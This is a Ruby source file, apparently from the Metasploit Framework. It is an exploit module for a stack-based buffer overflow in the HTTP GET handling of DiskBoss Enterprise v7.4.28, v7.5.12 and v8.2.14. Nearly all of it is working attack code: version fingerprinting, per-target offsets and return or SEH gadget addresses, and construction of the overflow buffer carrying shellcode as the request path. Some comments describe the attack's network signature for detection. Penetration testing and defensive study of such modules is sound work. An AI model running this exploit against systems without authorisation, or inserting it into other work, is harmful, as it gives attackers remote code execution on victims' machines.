GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpClient

  # Module metadata: the affected version banners, the per-version stack
  # layout ('Offset' / 'Ret') and the payload constraints. Target 0 ('auto')
  # carries no layout of its own; #exploit resolves it at runtime from the
  # banner returned by the web interface.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
          caused by improper bounds checking of the request path in HTTP GET
          requests sent to the built-in web server. This module has been
          tested successfully on Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'vportal', # Vulnerability discovery and PoC
          'Ahmad Mahfouz', # Vulnerability discovery and PoC
          'Gabor Seljan', # Metasploit module
          'Jacob Robles' # Metasploit module
        ],
        'References' => [
          ['EDB', '40869'],
          ['EDB', '42395']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          # Whitespace and NUL are excluded because the payload travels in the
          # request path of an HTTP GET.
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'Space' => 2000
        },
        'Targets' => [
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
              'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v7.5.12',
            {
              'Offset' => 2471,
              'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v8.2.14',
            {
              'Offset' => 2496,
              'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2016-12-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Fingerprints the DiskBoss web interface from the banner in the body of a
  # plain GET /.
  #
  # @return [Exploit::CheckCode] Vulnerable when the banner names one of the
  #   three affected versions, Detected for any other DiskBoss Enterprise
  #   banner, Unknown when there is no 200 response, Safe otherwise.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    if res && res.code == 200
      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /DiskBoss Enterprise/
        return Exploit::CheckCode::Detected
      end
    else
      # Reached for a nil response and for any non-200 status, not only a
      # timeout, so the message is narrower than the condition it reports on.
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  # Builds the oversized request path for the selected target and sends it as
  # the URI of a single HTTP GET. With the 'auto' target the version is read
  # from the GET / banner (same version strings as #check); any other target
  # is used as selected. Aborts with Failure::NoTarget when nothing matches.
  #
  # Network artifact: one GET whose path is several thousand bytes long
  # (roughly 'Offset' + 4 + 2500 bytes for the v7 targets, 5000 bytes for
  # v8.2.14), mostly alphabetic filler. An abnormally long request path to the
  # DiskBoss web port is the observable signature of this module.
  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/'
      )

      if res && res.code == 200
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
          mytarget = targets[1]
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
          mytarget = targets[2]
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
          mytarget = targets[3]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    case mytarget
    when targets[1], targets[2]
      # v7 layout: 21-byte NOP sled, payload plus filler totalling 'Offset'
      # bytes, the 32-bit little-endian 'Ret' value, then 2500 bytes of
      # trailing filler. 'Space' (2000) is below both Offsets, so the filler
      # length cannot go negative.
      sploit = make_nops(21)
      sploit << payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit << [mytarget.ret].pack('V')
      sploit << rand_text_alpha(2500)
    when targets[3]
      # v8.2.14 layout: SEH record instead of a direct return address. The
      # record is written at the current length via index assignment (same
      # effect as appending), followed by NOPs, a relative jump the original
      # comment identifies as landing in the shellcode, and filler that pads
      # the path to exactly 5000 bytes.
      seh = generate_seh_record(mytarget.ret)
      sploit = payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit[sploit.length, seh.length] = seh
      sploit << make_nops(10)
      sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
      sploit << rand_text_alpha(5000 - sploit.length)
    else
      fail_with(Failure::NoTarget, 'No matching target')
    end

    # The whole buffer is sent as the request path, which is the field the
    # description says is not bounds-checked by the built-in web server.
    send_request_cgi(
      'method' => 'GET',
      'uri' => sploit
    )
  end
end